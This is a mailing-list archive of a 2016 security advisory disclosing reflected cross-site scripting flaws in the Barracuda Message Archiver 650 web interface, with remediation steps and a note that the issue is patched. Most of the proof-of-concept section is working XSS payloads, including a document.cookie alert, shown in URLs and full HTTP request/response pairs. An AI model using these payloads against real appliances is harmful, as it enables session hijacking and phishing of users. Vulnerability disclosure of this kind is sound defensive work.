[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Barracuda Networks Bug Bounty #38 Message Archiver - Multiple Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-01-27 14:14:52
Message-ID: 56A8D0DC.6090502 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Barracuda Networks Bug Bounty #38 Message Archiver - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1108
Barracuda Networks Security ID (BNSEC): BNSEC-1530
Release Date:
=============
2016-01-08
Vulnerability Laboratory ID (VL-ID):
====================================
1108
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
Barracuda Networks, Inc. offers industry-leading solutions designed to solve mainstream IT \
problems – efficiently and cost effectively – while maintaining a level of customer \
support and satisfaction second to none. Their products span three distinct markets, \
including:
1. Content security,
2. Networking and application delivery,
3. Data storage, protection and disaster recovery.
While Barracuda Networks maintain a strong heritage in email and web security appliances, their \
award-winning portfolio includes more than a dozen purpose-built solutions that support \
literally every aspect of the network – providing organizations of all sizes with true \
end-to-end protection that can be deployed in hardware, virtual, cloud and mixed form factors.
CitiBank, Coca-Cola, Delta Dental, FedEx, Harvard University, IBM, L`Oreal, Liberty Tax \
Service, Mythbusters and Spokane Public Schools are amongst the more than 150,000 \
organizations worldwide confidently protecting their users, applications and data with \
Barracuda Networks' solutions. The company is privately held with its international \
headquarters and manufacturing facility based in Campbell, California. Barracuda Networks has \
offices in eight international locations and distributors in more than 80 countries.
The Barracuda Message Archiver is a complete and affordable email archiving solution, enabling \
you to effectively index and preserve all emails, enhance operational efficiencies and enforce \
policies for regulatory compliance. By leveraging standard policies and seamless access to \
messages, email content is fully indexed and backed up to enable administrators, auditors and \
end users quick retrieval of any email message stored in an organization's email archive.
- Comprehensive archiving
- Exchange stubbing
- Search and retrieval
- Policy management
- Intelligent Storage Manager
- Roles-based interface
- Reporting and statistics
The Barracuda Message Archiver features an easy-to-use Web user interface, creating an \
intuitive and cost-effective administration tool for the integrated hardware and software \
solution. The Web user interface allows administrators to define, manage and control corporate \
archiving settings and rules from one central location.
(Copy of the Vendor Homepage: http://www.barraguard.com/650.asp )
Abstract Advisory Information:
==============================
The vulnerability Laboratory Research Team has discovered multiple web validation \
vulnerabilities in the barracuda Message Archiver v650 Product.
Vulnerability Disclosure Timeline:
==================================
2016-01-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Message Archiver 650 - Appliance Application 3.2.0.924
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple client side cross site web vulnerabilities has been discovered in the official \
Barracuda Networks Message Archiver 650 Appliance Web-Application. The non-persistent cross \
site scripting web vulnerability allows remote attackers to manipulate client-side \
web-application to browser requests.
The payload can be injected in multiple parameters of the affected file in order to \
successfully exploit this web vulnerability. The vulnerability affects the \
`view_message_log_detail.cgi` file and the code execution happens when the application renders \
an error handling exception or handles an event. During the testing, the value of the \
vulnerable request parameters was copied into the value of an HTML tag attribute which was an \
event handler and or exception handler and was encapsulated in double quotation marks. The \
payload ea120`\"><script>alert(1)</script>9335e4791a6 was submitted in all affected \
parameters. This input was echoed unmodified in the application`s response proving the \
existence of this vulnerability. These sort of vulnerabilities can result in multiple attack \
vectors on the client end which may eventually result in complete compromise of the end user \
system.
Exploitation of this client side cross site scripting web vulnerability requires only low user \
interaction. Successful exploitation of the vulnerability may result in malicious script code \
being executed in the victims browser resulting in script code injection, phishing, \
client-side redirects and similar client-side web attacks.
Vulnerable File(s):
[+] view_message_log_detail.cgi
Vulnerable Parameter(s):
[+] /cgi-mod/view_message_log_detail.cgi [et parameter]
[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]
[+] /cgi-mod/view_message_log_detail.cgi [password parameter]
[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]
[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]
[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]
Affected Files(s):
[+] /cgi-mod/view_message_log_detail.cgi
[+] /cgi-mod/get_source.cgi
[+] /cgi-mod/index.cgi
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers \
with low or medium required user interaction. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.
POC URL #1: (XSS in error exception handling)
https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest
&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120%22%3E
%3Cscript%3Ealert%28/POC/%29%3C/script
%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&
searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492
POC URL #2: (XSS in event handler)
https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest
&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863%22style%3d%22behavior
%3aurl%28%23default%23time2%29%22onbegin%3d%22alert
%281%29%22d9b8f60df30&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=
archive_searchea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C/script%3E9335e4791a6&searchid=1ea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C
/script%3E9335e4791a6&action=readmessage&scrollbars=yes&resizable=yes&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492
POC URL #3: (document cookie)
https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=
1380626312&locale=en_USea120%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script
%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&
action=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492
Source Code (Exception Handling)
<html><head></head><body \
onload="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab= \
archive_search&locale=en_US46728"><script>alert(/test/) </script>ef4164cbd7e'"> </body></html>
Source Code (Event Handling)
<td valign=top height=5 class=message_detail width=80 valign=top \
><nobr><b>Subject:</b></nobr></td> <td valign=top class=message_detail width=614 height=5 \
> colspan=5>BC_216.129.99.129</td><td height=5 width=3 class=message_detail> </td>
</tr><td valign=top height=5 class=message_detail width=80 valign=top \
><nobr><b>Date:</b></nobr></td> <td valign=top class=message_detail width=267 height=5 \
> colspan=1>2013-09-30 21:30:59<br>
<a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863"
style="behavior:url(#default#time2)"onbegin="alert(1)"d9b8f60df30&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&
secondary_tab=archive_searchea120"><script>alert(/POC2/)
</script>9335e4791a6&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest">Download</a></td>
<td height=5 width=3 class=message_detail> </td>
</tr>
<tr>
POC HTTP Requests:
Request #1 (et):
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006"><script>alert(1)
</script>f8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&
searchid=1&action=readmessage&scrollbars=yes&resi
zable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?
auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive
Response #1
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 12:34:31 GMT
Date: Tue, 01 Oct 2013 12:34:31 GMT
Content-Length: 8431
<html style="margin:0;padding:0;height:100%"><head><meta http-equiv="Content-Type" \
content="text/html; charset=utf-8"><title>BC_216.129.99.129</title> <link rel="stylesheet" \
type="text/css" href="/barr
...
<a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006"><script>alert(1)
</script>f8eb700f5ef&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&secondary_tab=archive_search&file=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=
Request #2 (en_US)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120"><script>alert(1)
</script>9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&
scrollbars=yes&resizable=yes&id=
0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?
auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive
Response #2
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Sun, 02 Oct 2011 12:36:25 GMT
Date: Tue, 01 Oct 2013 12:36:25 GMT
Content-Length: 177
<html><body onLoad="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_search&locale=en_USea120"><script>alert(1)
</script>9335e4791a6'"> </body></html>
Request #3 (password)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff"><script>alert(1)</script>e2b3b338db0&
et=13806263121c006%22%3E
%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&
action=readmessage&scrollbars=yes&resizable=
yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29;
ys-details_south=o%3Acollapsed%3Db%253A1;
ys-details_east=o%3Acollapsed%3Db%253A0;
ys-details_west=o%3Acollapsed%3Db
%253A1
Response #3
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:23:09 GMT
Date: Tue, 01 Oct 2013 18:23:09 GMT
Content-Length: 8474
<html style="margin:0;padding:0;height:100%"><head><meta http-equiv="Content-Type" \
content="text/html; charset=utf-8"><title>BC_216.129.99.129</title> <link rel="stylesheet" \
type="text/css" href="/barr
...
<a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff"><script>alert(1)
</script>e2b3b338db0&et=13806263121c006">
...
Request #4 (primary_tab)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC2cc86<script>alert(1)
</script>4b6dfc58551&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 \
HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29;
ys-details_south=o%3Acollapsed%3Db%253A1;
ys-details_east=o%3Acollapsed%3Db%253A0;
ys-details_west=o%3Acollapsed%3Db
%253A1
Connection: keep-alive
Response #4
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:40:02 GMT
Date: Tue, 01 Oct 2013 18:40:02 GMT
Content-Length: 8525
<html style="margin:0;padding:0;height:100%"><head><meta http-equiv="Content-Type" \
content="text/html; charset=utf-8"><title>BC_216.129.99.129</title> <link rel="stylesheet" \
type="text/css" href="/barr
...
</script>f8eb700f5ef&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC2cc86<script>alert(1)
</script>4b6dfc58551&secondary_tab=archive_search&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest">
...
Request #5 (realm)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=3111a"><script>alert(1)
</script>99f8452d662&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29;
ys-details_south=o%3Acollapsed%3Db%253A1;
ys-details_east=o%3Acollapsed%3Db%253A0;
ys-details_west=o%3Acollapsed%3Db
%253A1
Connection: keep-alive
Response #5
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:33:27 GMT
Date: Tue, 01 Oct 2013 18:33:27 GMT
Content-Length: 8474
<html style="margin:0;padding:0;height:100%"><head><meta http-equiv="Content-Type" \
content="text/html; charset=utf-8"><title>BC_216.129.99.129</title> <link rel="stylesheet" \
type="text/css" href="/barr
...
<a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=3111a"><script>alert(1)
</script>99f8452d662&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006">
...
Request #6 (secondary_tab)
GET /cgi-mod/view_message_log_detail.cgi?
user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_US&realm=&auth_type=Local&policy_query=&
primary_tab=BASIC&secondary_tab=archive_searchfd89
2"><script>alert(1)</script>4fee14c256a&searchid=1&action=readmessage&scrollbars=yes&resizable=yes
&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?
auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive
Response #6
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Sun, 02 Oct 2011 12:43:18 GMT
Date: Tue, 01 Oct 2013 12:43:18 GMT
Content-Length: 177
<html><body onLoad="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_searchfd892"><script>alert(1)
</script>4fee14c256a&locale=en_US'"> </body></html>
Solution - Fix & Patch:
=======================
1. Parse the view_message_log_details.cgi input and encode the attached vulnerable parameters.
2. Parse the vulnerable output parameters in the get_source.cgi and index.cgi files
3. Restrict the input parameters and connect it with the regular appliance model filter \
mechanism
[+] /cgi-mod/view_message_log_detail.cgi
[+] /cgi-mod/get_source.cgi
[+] /cgi-mod/index.cgi
[+] /cgi-mod/view_message_log_detail.cgi [et parameter]
[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]
[+] /cgi-mod/view_message_log_detail.cgi [password parameter]
[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]
[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]
[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities are estimated as \
medium. (CVSS 3.0)
Note: The vulnerability has been patched by the barracuda networks security team. Te patches \
are already available in the customer section of the service portal.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic